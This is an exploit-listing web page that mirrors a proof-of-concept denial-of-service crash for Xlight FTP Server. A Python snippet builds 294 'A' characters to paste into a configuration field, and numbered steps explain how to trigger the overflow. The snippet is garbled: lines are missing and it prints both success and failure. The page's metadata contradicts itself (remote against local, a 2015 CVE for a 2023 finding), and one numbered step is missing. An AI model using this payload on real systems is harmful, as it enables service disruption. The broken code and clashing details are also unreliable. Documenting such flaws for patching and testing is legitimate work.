Xlight FTP Server Stack Buffer Overflow (DOS)

CVE Category Price Severity
CVE-2015-6529 CWE-119 $500 High
Author Risk Exploitation Type Date
John Doe High Remote 2023-08-06

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Xlight FTP Server Stack Buffer Overflow (DOS)
# Exploit Title: Xlight FTP Server - 'Stack Buffer Overflow' (DOS)
# Discovered by: Yehia Elghaly
# Discovered Date: 2023-08-04
# Vendor Homepage:
# Software Link :
# Tested Version:
# Vulnerability Type: Buffer Overflow Local
# Tested on OS: Windows XP Professional SP3 - Windows 11 x64

# Description: Xlight FTP Server 'Execute Program' Buffer Overflow (PoC)

# Steps to reproduce:
# 1. - Download and Xlight FTP Server
# 2. - Run the python script and it will create exploit.txt file.
# 3. - Open Xlight FTP Server
# 4. - "File and Directory - Modify Virtual Server Configuration - Advanced - Misc- Setup 
# 6. - Execute a Program after use logged in-  Paste the characters 
# 7  - Crashed

#!/usr/bin/env python3

exploit = 'A' * 294

    with open("exploit.txt","w") as file:
    print("POC is created")
    print("POC not created")

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.